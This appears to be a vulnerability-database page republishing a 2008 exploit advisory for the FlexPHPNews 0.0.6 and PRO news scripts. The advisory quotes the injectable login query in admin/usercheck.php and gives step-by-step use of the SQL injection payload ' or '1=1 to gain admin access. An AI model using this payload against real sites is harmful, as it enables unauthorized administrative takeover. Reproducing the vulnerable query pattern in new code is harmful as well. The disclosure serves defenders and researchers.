Lucene search

K

FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability

🗓️ 14 Dec 2008 00:00:00Reported by OsirysType 
zdt
 zdt
🔗 0day.today👁 11 Views

FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
=================================================================
FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability 
=================================================================


[START]

#########################################################################################
[0x01] Informations:

Script         : FlexPHPNews PRO 0.0.6
Script	       : FlexPHPNews 0.0.6
Download       : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1  [0.0.6 Pro]
Download       : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1  [0.0.6]
Vulnerability  : Sql Injection (Auth bypass)
Author         : Osirys
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay

#########################################################################################
[0x02] Bug:[Sql Injection (Auth bypass)]
######

Bugged file is: /[path]/admin/usercheck.php

[CODE]

if (!empty($logincheck)){
$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'";
$results = $db->select($sql);

[/CODE]


[!] EXPLOIT DETAILS:

 [1] Go to /[path]/admin/index.php
 [2] Put as username and password the following sql code: ' or '1=1
 [3] You are the admin now, bypass succesfull =)

#########################################################################################

[/END]



#  0day.today [2018-03-28]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Dec 2008 00:00Current
7.1High risk
Vulners AI Score7.1
11
.json
Report